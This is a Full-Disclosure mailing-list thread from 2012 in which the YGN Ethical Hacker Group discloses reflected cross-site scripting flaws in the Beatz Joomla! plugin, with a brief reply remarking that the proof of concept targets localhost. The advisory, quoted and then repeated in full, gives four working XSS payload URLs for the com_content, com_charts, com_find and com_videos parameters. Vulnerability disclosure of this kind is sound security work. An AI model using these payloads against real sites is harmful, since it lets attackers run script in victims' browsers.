Re: [Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread David3 Gonnella 
poc on localhost is a bit unreachable...  fbvfdjkh3ruifwqebdf



On 04/15/12 18:39, YGN Ethical Hacker Group wrote:
> 1. OVERVIEW
> 
> Beatz 1.x versions are vulnerable to Cross Site Scripting.
> 
> 
> 2. BACKGROUND
> 
> Beatz is a set of powerful Social Networking Script Joomla! 1.5
> plugins that allows you to start your own favourite artist band
> website. Although it is just a Joomla! plugin, it comes with full
> Joolma! bundle for ease of use and installation.
> 
> 
> 3. VULNERABILITY DESCRIPTION
> 
> Multiple parameters were not properly sanitized upon submission, which
> allows attacker to conduct Cross Site Scripting attack. This may allow
> an attacker to create a specially crafted URL that would execute
> arbitrary script code in a victim's browser. The vulnerable plugins
> include: com_find, com_charts and com_videos.
> 
> 
> 4. VERSIONS AFFECTED
> 
> Tested in 1.x versions
> 
> 
> 5. PROOF-OF-CONCEPT/EXPLOIT
> 
> == Generic Joomla! 1.5 Double Encoding XSS
> 
> http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
> 
> == com_charts (parameter: do)
> 
> http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
> 
> == com_find (parameter: keyword)
> 
> http://localhost/beatz/index.php?do=listAll&keyword=++Search";>&option=com_find
> 
> == com_videos (parameter: video_keyword)
> 
> http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
> 
> 
> 6. SOLUTION
> 
> The vendor hasn't released the fixed yet.
> 
> 
> 7. VENDOR
> 
> Cogzidel Technologies Pvt Ltd.
> http://www.cogzidel.com/
> 
> 
> 8. CREDIT
> 
> Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
> 
> 
> 9. DISCLOSURE TIME-LINE
> 
> 2011-03-01: notified vendor
> 2012-04-15: vulnerability disclosed
> 
> 
> 10. REFERENCES
> 
> Original Advisory URL: 
> http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
> 
> #yehg [2012-04-15]
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 



0xB95E8B49.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities

2012-04-16 Thread YGN Ethical Hacker Group 
1. OVERVIEW

Beatz 1.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.


3. VULNERABILITY DESCRIPTION

Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.


4. VERSIONS AFFECTED

Tested in 1.x versions


5. PROOF-OF-CONCEPT/EXPLOIT

== Generic Joomla! 1.5 Double Encoding XSS

http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1

== com_charts (parameter: do)

http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts

== com_find (parameter: keyword)

http://localhost/beatz/index.php?do=listAll&keyword=++Search";>&option=com_find

== com_videos (parameter: video_keyword)

http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search


6. SOLUTION

The vendor hasn't released the fixed yet.


7. VENDOR

Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-03-01: notified vendor
2012-04-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss

#yehg [2012-04-15]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/